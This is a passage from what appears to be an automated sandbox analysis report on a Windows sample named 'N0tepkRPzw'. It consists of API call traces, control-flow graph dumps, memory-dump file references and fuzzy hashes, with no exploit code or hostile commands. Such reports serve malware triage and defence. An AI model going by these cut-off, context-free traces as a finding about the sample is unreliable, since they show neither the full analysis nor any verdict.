              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D600F6
              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D60127
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D603D4
              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D603F0
              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D60402
              • ReadFile.KERNEL32(00000000,?,00007FFE,00D83BA4,00000000), ref: 00D60421
              • CloseHandle.KERNEL32(00000000), ref: 00D60479
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D6048F
              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00D604E7
              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00D60510
              • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00D6054A
                • Part of subcall function 00D60085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D600A0
                • Part of subcall function 00D60085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D5EB86,Crypt32.dll,00000000,00D5EC0A,?,?,00D5EBEC,?,?,?), ref: 00D600C2
              • _swprintf.LIBCMT ref: 00D605BE
              • _swprintf.LIBCMT ref: 00D6060A
                • Part of subcall function 00D5400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D5401D
              • AllocConsole.KERNEL32 ref: 00D60612
              • GetCurrentProcessId.KERNEL32 ref: 00D6061C
              • AttachConsole.KERNEL32(00000000), ref: 00D60623
              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00D60649
              • WriteConsoleW.KERNEL32(00000000), ref: 00D60650
              • Sleep.KERNEL32(00002710), ref: 00D6065B
              • FreeConsole.KERNEL32 ref: 00D60661
              • ExitProcess.KERNEL32 ref: 00D60669
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
              • API String ID: 1201351596-3298887752
              • Opcode ID: 55849184a8abd35bbe0b7b2a739e7dbcdaf20595bbe26a4d443d69d2619c7ecb
              • Instruction ID: af92b68ceb2f98d6c828c5077e703c5132abeefa16053683ed5546eb78857e3b
              • Opcode Fuzzy Hash: 55849184a8abd35bbe0b7b2a739e7dbcdaf20595bbe26a4d443d69d2619c7ecb
              • Instruction Fuzzy Hash: C7D16EB1118384ABD731AF60D849B9FBBE8FF85B04F10491DF68D96340DBB096488B72

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 406 d6bdf5-d6be0d call d6e28c call d6e360 411 d6be13-d6be3d call d6aa36 406->411 412 d6ca90-d6ca9d 406->412 411->412 415 d6be43-d6be48 411->415 416 d6be49-d6be57 415->416 417 d6be58-d6be6d call d6a6c7 416->417 420 d6be6f 417->420 421 d6be71-d6be86 call d617ac 420->421 424 d6be93-d6be96 421->424 425 d6be88-d6be8c 421->425 427 d6ca5c-d6ca87 call d6aa36 424->427 428 d6be9c 424->428 425->421 426 d6be8e 425->426 426->427 427->416 443 d6ca8d-d6ca8f 427->443 429 d6c074-d6c076 428->429 430 d6c115-d6c117 428->430 431 d6c132-d6c134 428->431 432 d6bea3-d6bea6 428->432 429->427 436 d6c07c-d6c088 429->436 430->427 434 d6c11d-d6c12d SetWindowTextW 430->434 431->427 435 d6c13a-d6c141 431->435 432->427 437 d6beac-d6bf06 call d69da4 call d5b965 call d5a49d call d5a5d7 call d570bf 432->437 434->427 435->427 439 d6c147-d6c160 435->439 440 d6c09c-d6c0a1 436->440 441 d6c08a-d6c09b call d77168 436->441 494 d6c045-d6c05a call d5a52a 437->494 444 d6c162 439->444 445 d6c168-d6c176 call d735b3 439->445 448 d6c0a3-d6c0a9 440->448 449 d6c0ab-d6c0b6 call d6ab9a 440->449 441->440 443->412 444->445 445->427 463 d6c17c-d6c185 445->463 450 d6c0bb-d6c0bd 448->450 449->450 456 d6c0bf-d6c0c6 call d735b3 450->456 457 d6c0c8-d6c0e8 call d735b3 call d735de 450->457 456->457 483 d6c101-d6c103 457->483 484 d6c0ea-d6c0f1 457->484 467 d6c187-d6c18b 463->467 468 d6c1ae-d6c1b1 463->468 467->468 469 d6c18d-d6c195 467->469 471 d6c296-d6c2a4 call d5fe56 468->471 472 d6c1b7-d6c1ba 468->472 469->427 475 d6c19b-d6c1a9 call d5fe56 469->475 485 d6c2a6-d6c2ba call d717cb 471->485 477 d6c1c7-d6c1e2 472->477 478 d6c1bc-d6c1c1 472->478 475->485 495 d6c1e4-d6c21e 477->495 496 d6c22c-d6c233 477->496 478->471 478->477 483->427 486 d6c109-d6c110 call d735ce 483->486 490 d6c0f3-d6c0f5 484->490 491 d6c0f8-d6c100 call d77168 484->491 505 d6c2c7-d6c318 call d5fe56 call d6a8d0 GetDlgItem SetWindowTextW SendMessageW call d735e9 485->505 506 d6c2bc-d6c2c0 485->506 486->427 490->491 491->483 512 d6c060-d6c06f call d5a4b3 494->512 513 d6bf0b-d6bf1f SetFileAttributesW 494->513 529 d6c222-d6c224 495->529 530 d6c220 495->530 499 d6c235-d6c24d call d735b3 496->499 500 d6c261-d6c284 call d735b3 * 2 496->500 499->500 516 d6c24f-d6c25c call d5fe2e 499->516 500->485 534 d6c286-d6c294 call d5fe2e 500->534 540 d6c31d-d6c321 505->540 506->505 511 d6c2c2-d6c2c4 506->511 511->505 512->427 518 d6bfc5-d6bfd5 GetFileAttributesW 513->518 519 d6bf25-d6bf58 call d5b4f7 call d5b207 call d735b3 513->519 516->500 518->494 527 d6bfd7-d6bfe6 DeleteFileW 518->527 550 d6bf5a-d6bf69 call d735b3 519->550 551 d6bf6b-d6bf79 call d5b925 519->551 527->494 533 d6bfe8-d6bfeb 527->533 529->496 530->529 537 d6bfef-d6c01b call d5400a GetFileAttributesW 533->537 534->485 546 d6bfed-d6bfee 537->546 547 d6c01d-d6c033 MoveFileW 537->547 540->427 545 d6c327-d6c33b SendMessageW 540->545 545->427 546->537 547->494 549 d6c035-d6c03f MoveFileExW 547->549 549->494 550->551 556 d6bf7f-d6bfbe call d735b3 call d6f350 550->556 551->512 551->556 556->518
              APIs
              • __EH_prolog.LIBCMT ref: 00D6BDFA
                • Part of subcall function 00D6AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00D6AAFE
              • SetWindowTextW.USER32(?,?), ref: 00D6C127
              • _wcsrchr.LIBVCRUNTIME ref: 00D6C2B1
              • GetDlgItem.USER32(?,00000066), ref: 00D6C2EC
              • SetWindowTextW.USER32(00000000,?), ref: 00D6C2FC
              • SendMessageW.USER32(00000000,00000143,00000000,00D9A472), ref: 00D6C30A
              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D6C335
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
              • API String ID: 3564274579-312220925
              • Opcode ID: 8a24102d7571bae4454d96ff7d8a5b57d933c2089f412e105f4e953f610e0e79
              • Instruction ID: 367993893824f4a3d66a0287da9c93e156c886ed815f7a630dfbe06b9807f1e4
              • Opcode Fuzzy Hash: 8a24102d7571bae4454d96ff7d8a5b57d933c2089f412e105f4e953f610e0e79
              • Instruction Fuzzy Hash: 93E16D72D00218ABDB25EBA4DC45EEF73BCEF08311F5441A6F949E3151EB749A888B70

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 561 d5d341-d5d378 call d6e28c call d6e360 call d715e8 568 d5d3ab-d5d3b4 call d5fe56 561->568 569 d5d37a-d5d3a9 GetModuleFileNameW call d5bc85 call d5fe2e 561->569 572 d5d3b9-d5d3dd call d59619 call d599b0 568->572 569->572 580 d5d7a0-d5d7a6 call d59653 572->580 581 d5d3e3-d5d3eb 572->581 586 d5d7ab-d5d7bb 580->586 583 d5d3ed-d5d405 call d63781 * 2 581->583 584 d5d409-d5d438 call d75a90 * 2 581->584 595 d5d407 583->595 594 d5d43b-d5d43e 584->594 596 d5d444-d5d44a call d59e40 594->596 597 d5d56c-d5d58f call d59d30 call d735d3 594->597 595->584 601 d5d44f-d5d476 call d59bf0 596->601 597->580 606 d5d595-d5d5b0 call d59bf0 597->606 607 d5d535-d5d538 601->607 608 d5d47c-d5d484 601->608 622 d5d5b2-d5d5b7 606->622 623 d5d5b9-d5d5cc call d735d3 606->623 609 d5d53b-d5d55d call d59d30 607->609 611 d5d486-d5d48e 608->611 612 d5d4af-d5d4ba 608->612 609->594 625 d5d563-d5d566 609->625 611->612 617 d5d490-d5d4aa call d75ec0 611->617 614 d5d4e5-d5d4ed 612->614 615 d5d4bc-d5d4c8 612->615 620 d5d4ef-d5d4f7 614->620 621 d5d519-d5d51d 614->621 615->614 619 d5d4ca-d5d4cf 615->619 633 d5d4ac 617->633 634 d5d52b-d5d533 617->634 619->614 626 d5d4d1-d5d4e3 call d75808 619->626 620->621 627 d5d4f9-d5d513 call d75ec0 620->627 621->607 628 d5d51f-d5d522 621->628 629 d5d5f1-d5d5f8 622->629 623->580 639 d5d5d2-d5d5ee call d6137a call d735ce 623->639 625->580 625->597 626->614 644 d5d527 626->644 627->580 627->621 628->608 636 d5d5fc-d5d625 call d5fdfb call d735d3 629->636 637 d5d5fa 629->637 633->612 634->609 651 d5d627-d5d62e call d735ce 636->651 652 d5d633-d5d649 636->652 637->636 639->629 644->634 651->580 653 d5d731-d5d757 call d5ce72 call d735ce * 2 652->653 654 d5d64f-d5d65d 652->654 694 d5d771-d5d79d call d75a90 * 2 653->694 695 d5d759-d5d76f call d63781 * 2 653->695 656 d5d664-d5d669 654->656 659 d5d97c-d5d984 656->659 660 d5d66f-d5d678 656->660 664 d5d72b-d5d72e 659->664 665 d5d98a-d5d98e 659->665 662 d5d684-d5d68b 660->662 663 d5d67a-d5d67e 660->663 667 d5d691-d5d6b6 662->667 668 d5d880-d5d891 call d5fcbf 662->668 663->659 663->662 664->653 669 d5d990-d5d996 665->669 670 d5d9de-d5d9e4 665->670 674 d5d6b9-d5d6de call d735b3 call d75808 667->674 686 d5d897-d5d8c0 call d5fe56 call d75885 668->686 687 d5d976-d5d979 668->687 675 d5d722-d5d725 669->675 676 d5d99c-d5d9a3 669->676 672 d5d9e6-d5d9ec 670->672 673 d5da0a-d5da2a call d5ce72 670->673 672->673 679 d5d9ee-d5d9f4 672->679 698 d5da02-d5da05 673->698 712 d5d6f6 674->712 713 d5d6e0-d5d6ea 674->713 675->656 675->664 682 d5d9a5-d5d9a8 676->682 683 d5d9ca 676->683 679->675 689 d5d9fa-d5da01 679->689 692 d5d9c6-d5d9c8 682->692 693 d5d9aa-d5d9ad 682->693 688 d5d9cc-d5d9d9 683->688 686->687 721 d5d8c6-d5d93c call d61596 call d5fdfb call d5fdd4 call d5fdfb call d758d9 686->721 687->659 688->675 689->698 692->688 700 d5d9c2-d5d9c4 693->700 701 d5d9af-d5d9b2 693->701 694->580 695->694 700->688 706 d5d9b4-d5d9b8 701->706 707 d5d9be-d5d9c0 701->707 706->679 714 d5d9ba-d5d9bc 706->714 707->688 719 d5d6f9-d5d6fd 712->719 713->712 718 d5d6ec-d5d6f4 713->718 714->688 718->719 719->674 720 d5d6ff-d5d706 719->720 722 d5d70c-d5d71a call d5fdfb 720->722 723 d5d7be-d5d7c1 720->723 753 d5d93e-d5d947 721->753 754 d5d94a-d5d95f 721->754 728 d5d71f 722->728 723->668 727 d5d7c7-d5d7ce 723->727 730 d5d7d6-d5d7d7 727->730 731 d5d7d0-d5d7d4 727->731 728->675 730->727 731->730 733 d5d7d9-d5d7e7 731->733 735 d5d7e9-d5d7ec 733->735 736 d5d808-d5d830 call d61596 733->736 737 d5d805 735->737 738 d5d7ee-d5d803 735->738 743 d5d853-d5d85b 736->743 744 d5d832-d5d84e call d735e9 736->744 737->736 738->735 738->737 747 d5d862-d5d87b call d5dd6b 743->747 748 d5d85d 743->748 744->728 747->728 748->747 753->754 756 d5d960-d5d967 754->756 757 d5d973-d5d974 756->757 758 d5d969-d5d96d 756->758 757->756 758->728 758->757
              APIs
              • __EH_prolog.LIBCMT ref: 00D5D346
              • _wcschr.LIBVCRUNTIME ref: 00D5D367
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00D5D328,?), ref: 00D5D382
              • __fprintf_l.LIBCMT ref: 00D5D873
                • Part of subcall function 00D6137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00D5B652,00000000,?,?,?,0001047C), ref: 00D61396
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
              • API String ID: 4184910265-980926923
              • Opcode ID: e091796a0f148ad761b015fcb86c25dc1d932e816adaf46e8e6b54eaa834079a
              • Instruction ID: 7c7115d0aa16a8e757374d1c28a3af807376092cd33cbf06fc0692b91e0e1f19
              • Opcode Fuzzy Hash: e091796a0f148ad761b015fcb86c25dc1d932e816adaf46e8e6b54eaa834079a
              • Instruction Fuzzy Hash: 2612A2719002199EDF34EFA4D881BEEB7B6EF04701F14456AED46A7291EB709A48CB70

              Control-flow Graph

              APIs
                • Part of subcall function 00D6AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D6AC85
                • Part of subcall function 00D6AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D6AC96
                • Part of subcall function 00D6AC74: IsDialogMessageW.USER32(0001047C,?), ref: 00D6ACAA
                • Part of subcall function 00D6AC74: TranslateMessage.USER32(?), ref: 00D6ACB8
                • Part of subcall function 00D6AC74: DispatchMessageW.USER32(?), ref: 00D6ACC2
              • GetDlgItem.USER32(00000068,00DAECB0), ref: 00D6CB6E
              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00D6A632,00000001,?,?,00D6AECB,00D84F88,00DAECB0), ref: 00D6CB96
              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D6CBA1
              • SendMessageW.USER32(00000000,000000C2,00000000,00D835B4), ref: 00D6CBAF
              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D6CBC5
              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D6CBDF
              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D6CC23
              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D6CC31
              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D6CC40
              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D6CC67
              • SendMessageW.USER32(00000000,000000C2,00000000,00D8431C), ref: 00D6CC76
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
              • String ID: \
              • API String ID: 3569833718-2967466578
              • Opcode ID: e352e0b7c0fe8130515790e6077f9fa430d03761ab42cac0582c5e231c3bdfbb
              • Instruction ID: 9596c30f71faaf4b7bd19e5d02ca0a6e39c8a37f06f46d48668bd66f88f14344
              • Opcode Fuzzy Hash: e352e0b7c0fe8130515790e6077f9fa430d03761ab42cac0582c5e231c3bdfbb
              • Instruction Fuzzy Hash: 3A31B072585341EFD301EF20DC8AFBB7EACEB42704F000609F691D6291DB644908DB76

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 796 d6ce22-d6ce3a call d6e360 799 d6ce40-d6ce4c call d735b3 796->799 800 d6d08b-d6d093 796->800 799->800 803 d6ce52-d6ce7a call d6f350 799->803 806 d6ce84-d6ce91 803->806 807 d6ce7c 803->807 808 d6ce95-d6ce9e 806->808 809 d6ce93 806->809 807->806 810 d6ced6 808->810 811 d6cea0-d6cea2 808->811 809->808 813 d6ceda-d6cedd 810->813 812 d6ceaa-d6cead 811->812 814 d6ceb3-d6cebb 812->814 815 d6d03c-d6d041 812->815 816 d6cee4-d6cee6 813->816 817 d6cedf-d6cee2 813->817 818 d6d055-d6d05d 814->818 819 d6cec1-d6cec7 814->819 820 d6d036-d6d03a 815->820 821 d6d043 815->821 822 d6cef9-d6cf0e call d5b493 816->822 823 d6cee8-d6ceef 816->823 817->816 817->822 824 d6d065-d6d06d 818->824 825 d6d05f-d6d061 818->825 819->818 828 d6cecd-d6ced4 819->828 820->815 829 d6d048-d6d04c 820->829 821->829 831 d6cf27-d6cf32 call d5a180 822->831 832 d6cf10-d6cf1d call d617ac 822->832 823->822 826 d6cef1 823->826 824->813 825->824 826->822 828->810 828->812 829->818 838 d6cf34-d6cf4b call d5b239 831->838 839 d6cf4f-d6cf5c ShellExecuteExW 831->839 832->831 837 d6cf1f 832->837 837->831 838->839 841 d6cf62-d6cf6f 839->841 842 d6d08a 839->842 843 d6cf82-d6cf84 841->843 844 d6cf71-d6cf78 841->844 842->800 847 d6cf86-d6cf8f 843->847 848 d6cf9b-d6cfba call d6d2e6 843->848 844->843 846 d6cf7a-d6cf80 844->846 846->843 849 d6cff1-d6cffd CloseHandle 846->849 847->848 857 d6cf91-d6cf99 ShowWindow 847->857 848->849 866 d6cfbc-d6cfc4 848->866 850 d6d00e-d6d01c 849->850 851 d6cfff-d6d00c call d617ac 849->851 855 d6d01e-d6d020 850->855 856 d6d079-d6d07b 850->856 851->850 863 d6d072 851->863 855->856 861 d6d022-d6d028 855->861 856->842 860 d6d07d-d6d07f 856->860 857->848 860->842 864 d6d081-d6d084 ShowWindow 860->864 861->856 865 d6d02a-d6d034 861->865 863->856 864->842 865->856 866->849 867 d6cfc6-d6cfd7 GetExitCodeProcess 866->867 867->849 868 d6cfd9-d6cfe3 867->868 869 d6cfe5 868->869 870 d6cfea 868->870 869->870 870->849
              APIs
              • ShellExecuteExW.SHELL32(?), ref: 00D6CF54
              • ShowWindow.USER32(?,00000000), ref: 00D6CF93
              • GetExitCodeProcess.KERNEL32(?,?), ref: 00D6CFCF
              • CloseHandle.KERNEL32(?), ref: 00D6CFF5
              • ShowWindow.USER32(?,00000001), ref: 00D6D084
                • Part of subcall function 00D617AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D5BB05,00000000,.exe,?,?,00000800,?,?,00D685DF,?), ref: 00D617C2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
              • String ID: $.exe$.inf
              • API String ID: 3686203788-2452507128
              • Opcode ID: d701557215bbc2db896318337480ebcd77ca477750f4835c3e62ef3707e37c66
              • Instruction ID: 41988e520b240d076a50b8effbebcf6e7cfd4a6dfbde0c6825c0d9fe4d892647
              • Opcode Fuzzy Hash: d701557215bbc2db896318337480ebcd77ca477750f4835c3e62ef3707e37c66
              • Instruction Fuzzy Hash: 8061E3709143809BDB319F24E804ABBBBF6EF85344F08581AF4C597255D7B2D989CB72

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 871 d7a058-d7a071 872 d7a087-d7a08c 871->872 873 d7a073-d7a083 call d7e6ed 871->873 875 d7a08e-d7a096 872->875 876 d7a099-d7a0bd MultiByteToWideChar 872->876 873->872 880 d7a085 873->880 875->876 878 d7a0c3-d7a0cf 876->878 879 d7a250-d7a263 call d6ec4a 876->879 881 d7a123 878->881 882 d7a0d1-d7a0e2 878->882 880->872 884 d7a125-d7a127 881->884 885 d7a0e4-d7a0f3 call d81a30 882->885 886 d7a101-d7a112 call d78518 882->886 889 d7a245 884->889 890 d7a12d-d7a140 MultiByteToWideChar 884->890 885->889 896 d7a0f9-d7a0ff 885->896 886->889 897 d7a118 886->897 894 d7a247-d7a24e call d7a2c0 889->894 890->889 893 d7a146-d7a158 call d7a72c 890->893 901 d7a15d-d7a161 893->901 894->879 900 d7a11e-d7a121 896->900 897->900 900->884 901->889 903 d7a167-d7a16e 901->903 904 d7a170-d7a175 903->904 905 d7a1a8-d7a1b4 903->905 904->894 908 d7a17b-d7a17d 904->908 906 d7a1b6-d7a1c7 905->906 907 d7a200 905->907 909 d7a1e2-d7a1f3 call d78518 906->909 910 d7a1c9-d7a1d8 call d81a30 906->910 911 d7a202-d7a204 907->911 908->889 912 d7a183-d7a19d call d7a72c 908->912 914 d7a23e-d7a244 call d7a2c0 909->914 927 d7a1f5 909->927 910->914 926 d7a1da-d7a1e0 910->926 913 d7a206-d7a21f call d7a72c 911->913 911->914 912->894 924 d7a1a3 912->924 913->914 928 d7a221-d7a228 913->928 914->889 924->889 929 d7a1fb-d7a1fe 926->929 927->929 930 d7a264-d7a26a 928->930 931 d7a22a-d7a22b 928->931 929->911 932 d7a22c-d7a23c WideCharToMultiByte 930->932 931->932 932->914 933 d7a26c-d7a273 call d7a2c0 932->933 933->894
              APIs
              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D74E35,00D74E35,?,?,?,00D7A2A9,00000001,00000001,3FE85006), ref: 00D7A0B2
              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D7A2A9,00000001,00000001,3FE85006,?,?,?), ref: 00D7A138
              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D7A232
              • __freea.LIBCMT ref: 00D7A23F
                • Part of subcall function 00D78518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D7C13D,00000000,?,00D767E2,?,00000008,?,00D789AD,?,?,?), ref: 00D7854A
              • __freea.LIBCMT ref: 00D7A248
              • __freea.LIBCMT ref: 00D7A26D
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ByteCharMultiWide__freea$AllocateHeap
              • String ID:
              • API String ID: 1414292761-0
              • Opcode ID: da7781c619d176faef495db4322656af15c7f52d515b4e4db68c2064e2ab9f05
              • Instruction ID: 1f66b08920160571e3f53ce7f76693d43af8cb9c93a059e2f0f7700621f7fa56
              • Opcode Fuzzy Hash: da7781c619d176faef495db4322656af15c7f52d515b4e4db68c2064e2ab9f05
              • Instruction Fuzzy Hash: C451F172610216AFEB259F68CC41EBF77A9EB81750F198629FC08D6181FB35DC40C6B6

              Control-flow Graph

              APIs
                • Part of subcall function 00D60085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D600A0
                • Part of subcall function 00D60085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D5EB86,Crypt32.dll,00000000,00D5EC0A,?,?,00D5EBEC,?,?,?), ref: 00D600C2
              • OleInitialize.OLE32(00000000), ref: 00D6A34E
              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D6A385
              • SHGetMalloc.SHELL32(00D98430), ref: 00D6A38F
              Strings
              Memory Dump Source
